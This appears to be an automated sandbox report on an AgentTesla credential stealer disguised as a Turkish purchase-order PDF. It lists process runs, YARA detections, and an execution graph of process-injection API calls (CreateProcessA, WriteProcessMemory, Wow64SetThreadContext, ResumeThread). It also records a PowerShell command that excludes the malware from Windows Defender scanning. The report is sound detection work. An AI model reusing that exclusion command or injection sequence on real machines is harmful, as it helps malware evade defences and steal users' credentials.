                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1325496333.0000000003B92000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:7
                              Start time:16:03:56
                              Start date:22/05/2024
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe"
                              Imagebase:0xe70000
                              File size:433'152 bytes
                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:8
                              Start time:16:03:56
                              Start date:22/05/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:9
                              Start time:16:03:56
                              Start date:22/05/2024
                              Path:C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe"
                              Imagebase:0x780000
                              File size:856'064 bytes
                              MD5 hash:B90266D6B73DB4F10B1CC8F90A81A4AA
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2545517189.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:false

                              General

                              Target ID:10
                              Start time:16:04:10
                              Start date:22/05/2024
                              Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                              Imagebase:0xc30000
                              File size:856'064 bytes
                              MD5 hash:B90266D6B73DB4F10B1CC8F90A81A4AA
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1486766690.00000000043BF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.1486766690.00000000043BF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Antivirus matches:
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 37%, ReversingLabs
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:12
                              Start time:16:04:13
                              Start date:22/05/2024
                              Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                              Imagebase:0x650000
                              File size:856'064 bytes
                              MD5 hash:B90266D6B73DB4F10B1CC8F90A81A4AA
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.1545932299.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.1545932299.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.1548552550.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:13
                              Start time:16:04:20
                              Start date:22/05/2024
                              Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                              Imagebase:0x910000
                              File size:856'064 bytes
                              MD5 hash:B90266D6B73DB4F10B1CC8F90A81A4AA
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.1575415406.000000000409F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.1575415406.000000000409F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:14
                              Start time:16:04:21
                              Start date:22/05/2024
                              Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                              Imagebase:0x7e0000
                              File size:856'064 bytes
                              MD5 hash:B90266D6B73DB4F10B1CC8F90A81A4AA
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.2544912217.0000000002C3B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:false

                              Disassembly

                              Reset < >

                                Execution Graph

                                Execution Coverage:10.4%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:188
                                Total number of Limit Nodes:7
                                execution_graph 22392 5e998e8 22393 5e99a73 22392->22393 22395 5e9990e 22392->22395 22395->22393 22396 5e97d78 22395->22396 22397 5e99b68 PostMessageW 22396->22397 22398 5e99bd4 22397->22398 22398->22395 22462 271d300 DuplicateHandle 22463 271d396 22462->22463 22464 5e96ede 22465 5e96ee4 22464->22465 22470 5e986d8 22465->22470 22485 5e9873e 22465->22485 22501 5e986cb 22465->22501 22466 5e96eef 22471 5e986f2 22470->22471 22472 5e986fa 22471->22472 22516 5e99093 22471->22516 22520 5e98b13 22471->22520 22525 5e98c11 22471->22525 22530 5e98cdf 22471->22530 22534 5e99378 22471->22534 22539 5e991a4 22471->22539 22544 5e98eae 22471->22544 22548 5e98f6b 22471->22548 22553 5e99336 22471->22553 22558 5e98fd7 22471->22558 22563 5e98db4 22471->22563 22568 5e98c92 22471->22568 22472->22466 22486 5e986cc 22485->22486 22488 5e98741 22485->22488 22487 5e986fa 22486->22487 22489 5e98f6b 2 API calls 22486->22489 22490 5e98eae 2 API calls 22486->22490 22491 5e991a4 2 API calls 22486->22491 22492 5e99378 2 API calls 22486->22492 22493 5e98cdf 2 API calls 22486->22493 22494 5e98c11 2 API calls 22486->22494 22495 5e98b13 2 API calls 22486->22495 22496 5e99093 2 API calls 22486->22496 22497 5e98c92 4 API calls 22486->22497 22498 5e98db4 2 API calls 22486->22498 22499 5e98fd7 2 API calls 22486->22499 22500 5e99336 2 API calls 22486->22500 22487->22466 22488->22466 22489->22487 22490->22487 22491->22487 22492->22487 22493->22487 22494->22487 22495->22487 22496->22487 22497->22487 22498->22487 22499->22487 22500->22487 22502 5e986d8 22501->22502 22503 5e986fa 22502->22503 22504 5e98f6b 2 API calls 22502->22504 22505 5e98eae 2 API calls 22502->22505 22506 5e991a4 2 API calls 22502->22506 22507 5e99378 2 API calls 22502->22507 22508 5e98cdf 2 API calls 22502->22508 22509 5e98c11 2 API calls 22502->22509 22510 5e98b13 2 API calls 22502->22510 22511 5e99093 2 API calls 22502->22511 22512 5e98c92 4 API calls 22502->22512 22513 5e98db4 2 API calls 22502->22513 22514 5e98fd7 2 API calls 22502->22514 22515 5e99336 2 API calls 22502->22515 22503->22466 22504->22503 22505->22503 22506->22503 22507->22503 22508->22503 22509->22503 22510->22503 22511->22503 22512->22503 22513->22503 22514->22503 22515->22503 22577 5e96428 22516->22577 22581 5e96421 22516->22581 22517 5e990b7 22521 5e98b32 22520->22521 22585 5e966b0 22521->22585 22589 5e966a4 22521->22589 22526 5e98c3a 22525->22526 22593 5e95da8 22526->22593 22597 5e95da0 22526->22597 22527 5e98c4f 22527->22472 22601 5e96368 22530->22601 22605 5e96360 22530->22605 22531 5e98d0f 22531->22472 22535 5e9937e 22534->22535 22536 5e993a1 22535->22536 22609 5e96518 22535->22609 22613 5e96510 22535->22613 22540 5e991b5 22539->22540 22541 5e98be5 22540->22541 22542 5e96428 WriteProcessMemory 22540->22542 22543 5e96421 WriteProcessMemory 22540->22543 22542->22541 22543->22541 22546 5e96428 WriteProcessMemory 22544->22546 22547 5e96421 WriteProcessMemory 22544->22547 22545 5e98edc 22546->22545 22547->22545 22549 5e98c3a 22548->22549 22550 5e98c4f 22549->22550 22551 5e95da8 ResumeThread 22549->22551 22552 5e95da0 ResumeThread 22549->22552 22550->22472 22551->22550 22552->22550 22554 5e98dde 22553->22554 22556 5e96518 ReadProcessMemory 22554->22556 22557 5e96510 ReadProcessMemory 22554->22557 22555 5e993a1 22555->22555 22556->22555 22557->22555 22559 5e9911f 22558->22559 22617 5e95e58 22559->22617 22621 5e95e50 22559->22621 22560 5e9913a 22564 5e98ddd 22563->22564 22566 5e96518 ReadProcessMemory 22564->22566 22567 5e96510 ReadProcessMemory 22564->22567 22565 5e993a1 22566->22565 22567->22565 22569 5e98ddd 22568->22569 22570 5e98c9f 22568->22570 22571 5e99572 22569->22571 22573 5e96518 ReadProcessMemory 22569->22573 22574 5e96510 ReadProcessMemory 22569->22574 22570->22569 22625 5e99747 22570->22625 22630 5e99758 22570->22630 22572 5e993a1 22573->22572 22574->22572 22578 5e96470 WriteProcessMemory 22577->22578 22580 5e964c7 22578->22580 22580->22517 22582 5e96428 WriteProcessMemory 22581->22582 22584 5e964c7 22582->22584 22584->22517 22586 5e96739 CreateProcessA 22585->22586 22588 5e968fb 22586->22588 22588->22588 22590 5e96739 CreateProcessA 22589->22590 22592 5e968fb 22590->22592 22592->22592 22594 5e95de8 ResumeThread 22593->22594 22596 5e95e19 22594->22596 22596->22527 22598 5e95da8 ResumeThread 22597->22598 22600 5e95e19 22598->22600 22600->22527 22602 5e963a8 VirtualAllocEx 22601->22602 22604 5e963e5 22602->22604 22604->22531 22606 5e96368 VirtualAllocEx 22605->22606 22608 5e963e5 22606->22608 22608->22531 22610 5e96563 ReadProcessMemory 22609->22610 22612 5e965a7 22610->22612 22612->22536 22614 5e96563 ReadProcessMemory 22613->22614 22616 5e965a7 22614->22616 22616->22536 22618 5e95e9d Wow64SetThreadContext 22617->22618 22620 5e95ee5 22618->22620 22620->22560 22622 5e95e9d Wow64SetThreadContext 22621->22622 22624 5e95ee5 22622->22624 22624->22560 22626 5e99758 22625->22626 22628 5e95e58 Wow64SetThreadContext 22626->22628 22629 5e95e50 Wow64SetThreadContext 22626->22629 22627 5e99783 22627->22569 22628->22627 22629->22627 22631 5e9976d 22630->22631 22633 5e95e58 Wow64SetThreadContext 22631->22633 22634 5e95e50 Wow64SetThreadContext 22631->22634 22632 5e99783 22632->22569 22633->22632 22634->22632 22399 271ad38 22403 271ae21 22399->22403 22411 271ae30 22399->22411 22400 271ad47 22404 271ae30 22403->22404 22405 271ae64 22404->22405 22419 271b0c8 22404->22419 22423 271b0b8 22404->22423 22405->22400 22406 271ae5c 22406->22405 22407 271b068 GetModuleHandleW 22406->22407 22408 271b095 22407->22408 22408->22400 22412 271ae41 22411->22412 22413 271ae64 22411->22413 22412->22413 22417 271b0c8 LoadLibraryExW 22412->22417 22418 271b0b8 LoadLibraryExW 22412->22418 22413->22400 22414 271ae5c 22414->22413 22415 271b068 GetModuleHandleW 22414->22415 22416 271b095 22415->22416 22416->22400 22417->22414 22418->22414 22420 271b0dc 22419->22420 22422 271b101 22420->22422 22427 271a870 22420->22427 22422->22406 22424 271b0c8 22423->22424 22425 271b101 22424->22425 22426 271a870 LoadLibraryExW 22424->22426 22425->22406 22426->22425 22428 271b2a8 LoadLibraryExW 22427->22428 22430 271b321 22428->22430 22430->22422 22431 271d0b8 22432 271d0fe GetCurrentProcess 22431->22432 22434 271d150 GetCurrentThread 22432->22434 22437 271d149 22432->22437 22435 271d18d GetCurrentProcess 22434->22435 22438 271d186 22434->22438 22436 271d1c3 22435->22436 22439 271d1eb GetCurrentThreadId 22436->22439 22437->22434 22438->22435 22440 271d21c 22439->22440 22441 2714668 22442 271467a 22441->22442 22443 2714686 22442->22443 22445 2714779 22442->22445 22446 271479d 22445->22446 22450 2714878 22446->22450 22454 2714888 22446->22454 22447 27147a7 22447->22443 22452 27148af 22450->22452 22451 271498c 22451->22447 22452->22451 22458 271449c 22452->22458 22455 27148af 22454->22455 22456 271449c CreateActCtxA 22455->22456 22457 271498c 22455->22457 22456->22457 22457->22447 22459 2715918 CreateActCtxA 22458->22459 22461 27159db 22459->22461

                                Executed Functions

                                Function 05E98C6F Relevance: .0, Instructions: 16COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.1329063984.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5e90000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1d553633780464108f43443f0e1192b9397e1474bdfdcff9e562f84868932415
                                • Instruction ID: e046d2df5e97746256c3616928db88ee946082ebd8eca9ec9287dcfc16f0e972
                                • Opcode Fuzzy Hash: 1d553633780464108f43443f0e1192b9397e1474bdfdcff9e562f84868932415
                                • Instruction Fuzzy Hash: DAD067789092148BCF18DF65D4445F8B7B9AB4B340F01709AD48AA7256E6309985CE18
                                Function 0271D0A8 Relevance: 6.1, APIs: 4, Instructions: 133threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 0271D136
                                • GetCurrentThread.KERNEL32 ref: 0271D173
                                • GetCurrentProcess.KERNEL32 ref: 0271D1B0
                                • GetCurrentThreadId.KERNEL32 ref: 0271D209
                                Memory Dump Source
                                • Source File: 00000005.00000002.1320031802.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2710000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: 2a43264b5ed1a774ae1748baa74f91e5981527000ba80da179631530923fae80
                                • Instruction ID: f0d485b378877be6921327aff64ea7d5b281962b503ecf3141a69a1509116116
                                • Opcode Fuzzy Hash: 2a43264b5ed1a774ae1748baa74f91e5981527000ba80da179631530923fae80
                                • Instruction Fuzzy Hash: DE5167B09003488FEB14DFA9D548BEEBBF1EF48314F248069E449A7360DB74A944CF65
                                Function 0271D0B8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 0271D136
                                • GetCurrentThread.KERNEL32 ref: 0271D173
                                • GetCurrentProcess.KERNEL32 ref: 0271D1B0
                                • GetCurrentThreadId.KERNEL32 ref: 0271D209
                                Memory Dump Source
                                • Source File: 00000005.00000002.1320031802.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2710000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: 9984c2ab1eabada456b1f6af9d2009f27a5d44c11d0f89633788797e90115a37
                                • Instruction ID: 8629c691622f895b5dcfb6fbfc2a552a5db465b6fd62bc45c281c3b102d2e057
                                • Opcode Fuzzy Hash: 9984c2ab1eabada456b1f6af9d2009f27a5d44c11d0f89633788797e90115a37
                                • Instruction Fuzzy Hash: F05146B09007098FDB54DFAAD548BDEBBF1EF48314F208069E459A7350DB74A984CF65
                                Function 05E966A4 Relevance: 1.7, APIs: 1, Instructions: 245processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 44 5e966a4-5e96745 46 5e9677e-5e9679e 44->46 47 5e96747-5e96751 44->47 54 5e967a0-5e967aa 46->54 55 5e967d7-5e96806 46->55 47->46 48 5e96753-5e96755 47->48 49 5e96778-5e9677b 48->49 50 5e96757-5e96761 48->50 49->46 52 5e96763 50->52 53 5e96765-5e96774 50->53 52->53 53->53 56 5e96776 53->56 54->55 57 5e967ac-5e967ae 54->57 61 5e96808-5e96812 55->61 62 5e9683f-5e968f9 CreateProcessA 55->62 56->49 59 5e967d1-5e967d4 57->59 60 5e967b0-5e967ba 57->60 59->55 63 5e967bc 60->63 64 5e967be-5e967cd 60->64 61->62 65 5e96814-5e96816 61->65 75 5e968fb-5e96901 62->75 76 5e96902-5e96988 62->76 63->64 64->64 66 5e967cf 64->66 67 5e96839-5e9683c 65->67 68 5e96818-5e96822 65->68 66->59 67->62 70 5e96824 68->70 71 5e96826-5e96835 68->71 70->71 71->71 72 5e96837 71->72 72->67 75->76 86 5e96998-5e9699c 76->86 87 5e9698a-5e9698e 76->87 89 5e969ac-5e969b0 86->89 90 5e9699e-5e969a2 86->90 87->86 88 5e96990 87->88 88->86 92 5e969c0-5e969c4 89->92 93 5e969b2-5e969b6 89->93 90->89 91 5e969a4 90->91 91->89 95 5e969d6-5e969dd 92->95 96 5e969c6-5e969cc 92->96 93->92 94 5e969b8 93->94 94->92 97 5e969df-5e969ee 95->97 98 5e969f4 95->98 96->95 97->98 100 5e969f5 98->100 100->100
                                APIs
                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05E968E6
                                Memory Dump Source
                                • Source File: 00000005.00000002.1329063984.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5e90000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 2e0d6f44b376d8975334f6caf00eb2881f45c1f7f28d634b105682ed3a5e1a0f
                                • Instruction ID: 06a03a563367d3bf9fb5ec2fc405ec4a92d6e6349cf27f96800adaf22d9dcf53
                                • Opcode Fuzzy Hash: 2e0d6f44b376d8975334f6caf00eb2881f45c1f7f28d634b105682ed3a5e1a0f
                                • Instruction Fuzzy Hash: 9CA15B71D00219DFEF24CF68C945BEDBBB2BF48304F1485AAD899A7240DB749985CF91
                                Function 05E966B0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 101 5e966b0-5e96745 103 5e9677e-5e9679e 101->103 104 5e96747-5e96751 101->104 111 5e967a0-5e967aa 103->111 112 5e967d7-5e96806 103->112 104->103 105 5e96753-5e96755 104->105 106 5e96778-5e9677b 105->106 107 5e96757-5e96761 105->107 106->103 109 5e96763 107->109 110 5e96765-5e96774 107->110 109->110 110->110 113 5e96776 110->113 111->112 114 5e967ac-5e967ae 111->114 118 5e96808-5e96812 112->118 119 5e9683f-5e968f9 CreateProcessA 112->119 113->106 116 5e967d1-5e967d4 114->116 117 5e967b0-5e967ba 114->117 116->112 120 5e967bc 117->120 121 5e967be-5e967cd 117->121 118->119 122 5e96814-5e96816 118->122 132 5e968fb-5e96901 119->132 133 5e96902-5e96988 119->133 120->121 121->121 123 5e967cf 121->123 124 5e96839-5e9683c 122->124 125 5e96818-5e96822 122->125 123->116 124->119 127 5e96824 125->127 128 5e96826-5e96835 125->128 127->128 128->128 129 5e96837 128->129 129->124 132->133 143 5e96998-5e9699c 133->143 144 5e9698a-5e9698e 133->144 146 5e969ac-5e969b0 143->146 147 5e9699e-5e969a2 143->147 144->143 145 5e96990 144->145 145->143 149 5e969c0-5e969c4 146->149 150 5e969b2-5e969b6 146->150 147->146 148 5e969a4 147->148 148->146 152 5e969d6-5e969dd 149->152 153 5e969c6-5e969cc 149->153 150->149 151 5e969b8 150->151 151->149 154 5e969df-5e969ee 152->154 155 5e969f4 152->155 153->152 154->155 157 5e969f5 155->157 157->157
                                APIs
                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05E968E6
                                Memory Dump Source
                                • Source File: 00000005.00000002.1329063984.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5e90000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: c293eec13b72c622a84eced1991a980f24326574c75546a5a0598a92b18bd8f9
                                • Instruction ID: 6b785954ef792f92bd5f100af421b495f2e07fee3467f302bda0e09b7fce8efa
                                • Opcode Fuzzy Hash: c293eec13b72c622a84eced1991a980f24326574c75546a5a0598a92b18bd8f9
                                • Instruction Fuzzy Hash: 34914B71D00219DFEF24CF68C845BEDBBB2BF48314F1485AAD899A7240DB749985CF91
                                Function 0271AE30 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 158 271ae30-271ae3f 159 271ae41-271ae4e call 2719838 158->159 160 271ae6b-271ae6f 158->160 165 271ae50 159->165 166 271ae64 159->166 162 271ae71-271ae7b 160->162 163 271ae83-271aec4 160->163 162->163 169 271aed1-271aedf 163->169 170 271aec6-271aece 163->170 213 271ae56 call 271b0c8 165->213 214 271ae56 call 271b0b8 165->214 166->160 171 271aee1-271aee6 169->171 172 271af03-271af05 169->172 170->169 174 271aef1 171->174 175 271aee8-271aeef call 271a814 171->175 177 271af08-271af0f 172->177 173 271ae5c-271ae5e 173->166 176 271afa0-271b060 173->176 179 271aef3-271af01 174->179 175->179 208 271b062-271b065 176->208 209 271b068-271b093 GetModuleHandleW 176->209 180 271af11-271af19 177->180 181 271af1c-271af23 177->181 179->177 180->181 183 271af30-271af39 call 271a824 181->183 184 271af25-271af2d 181->184 189 271af46-271af4b 183->189 190 271af3b-271af43 183->190 184->183 191 271af69-271af6d 189->191 192 271af4d-271af54 189->192 190->189 197 271af73-271af76 191->197 192->191 194 271af56-271af66 call 271a834 call 271a844 192->194 194->191 199 271af99-271af9f 197->199 200 271af78-271af96 197->200 200->199 208->209 210 271b095-271b09b 209->210 211 271b09c-271b0b0 209->211 210->211 213->173 214->173
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0271B086
                                Memory Dump Source
                                • Source File: 00000005.00000002.1320031802.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2710000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: ea02ec177e1418f1a7ffb7b5445a25fd6eb2bad7e4a5c56c3a37e60925dc4718
                                • Instruction ID: 4b14c5b869f99965e7cdea6035aa9e4f3657471aca024990fb4975d92c98a262
                                • Opcode Fuzzy Hash: ea02ec177e1418f1a7ffb7b5445a25fd6eb2bad7e4a5c56c3a37e60925dc4718
                                • Instruction Fuzzy Hash: F97157B0A01B058FD724DF2AD04579ABBF2FF88304F00892DD49AD7A50DB75E94ACB91
                                Function 0271449C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 215 271449c-27159d9 CreateActCtxA 218 27159e2-2715a3c 215->218 219 27159db-27159e1 215->219 226 2715a4b-2715a4f 218->226 227 2715a3e-2715a41 218->227 219->218 228 2715a51-2715a5d 226->228 229 2715a60 226->229 227->226 228->229 231 2715a61 229->231 231->231
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 027159C9
                                Memory Dump Source
                                • Source File: 00000005.00000002.1320031802.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2710000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: ffc3343ddc57523a9492bc24f67219235f474b113f95540e3b1d72b2f044b8be
                                • Instruction ID: 0be97ffc23e172d4d0465ec80ee0d2ba2dbe0ad69bbd425435a6c910f70284c1
                                • Opcode Fuzzy Hash: ffc3343ddc57523a9492bc24f67219235f474b113f95540e3b1d72b2f044b8be
                                • Instruction Fuzzy Hash: E041D2B0C00718CBEB24CFA9C884B9EBBB5BF49304F60806AD409AB251DB716949CF90
                                Function 0271590C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 232 271590c-2715912 233 271591c-27159d9 CreateActCtxA 232->233 235 27159e2-2715a3c 233->235 236 27159db-27159e1 233->236 243 2715a4b-2715a4f 235->243 244 2715a3e-2715a41 235->244 236->235 245 2715a51-2715a5d 243->245 246 2715a60 243->246 244->243 245->246 248 2715a61 246->248 248->248
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 027159C9
                                Memory Dump Source
                                • Source File: 00000005.00000002.1320031802.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2710000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: 5a02ff0ad083c51c2e1c000c77390af04dafdfc5f57a74b2228730ff4f430107
                                • Instruction ID: 005fee4dded69fe16da3a0177de1224780e20ccd01caf38946ff264d557544c9
                                • Opcode Fuzzy Hash: 5a02ff0ad083c51c2e1c000c77390af04dafdfc5f57a74b2228730ff4f430107
                                • Instruction Fuzzy Hash: 0641E2B0C00718CBEB24DFA9C884BDEBBB1BF49304F64806AD458AB251DB756949CF51
                                Function 05E96421 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 249 5e96421-5e96476 252 5e96478-5e96484 249->252 253 5e96486-5e964c5 WriteProcessMemory 249->253 252->253 255 5e964ce-5e964fe 253->255 256 5e964c7-5e964cd 253->256 256->255
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05E964B8
                                Memory Dump Source
                                • Source File: 00000005.00000002.1329063984.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5e90000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: c446f0594990e03ad2304e93dff94119b8c1e98383fde32a07bb4fb2cb26a1d3
                                • Instruction ID: c93e0075a7ceeddda8ff6777ae6a82cf800980d5447e943b503f4fdb58274de7
                                • Opcode Fuzzy Hash: c446f0594990e03ad2304e93dff94119b8c1e98383fde32a07bb4fb2cb26a1d3
                                • Instruction Fuzzy Hash: 382155B19003099FDF00CFAAC981BEEBBF5FF48314F54842AE959A7241D7789944CBA4
                                Function 05E96428 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 260 5e96428-5e96476 262 5e96478-5e96484 260->262 263 5e96486-5e964c5 WriteProcessMemory 260->263 262->263 265 5e964ce-5e964fe 263->265 266 5e964c7-5e964cd 263->266 266->265
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05E964B8
                                Memory Dump Source
                                • Source File: 00000005.00000002.1329063984.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5e90000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: c59255b4de98369263b956b668480a3dfc1f8a36816f2be65e5725e6159ad707
                                • Instruction ID: 731e117ab6d4ce4a8e0ece726be8021bbc110a2eac28c81d1c864f3522e4fea1
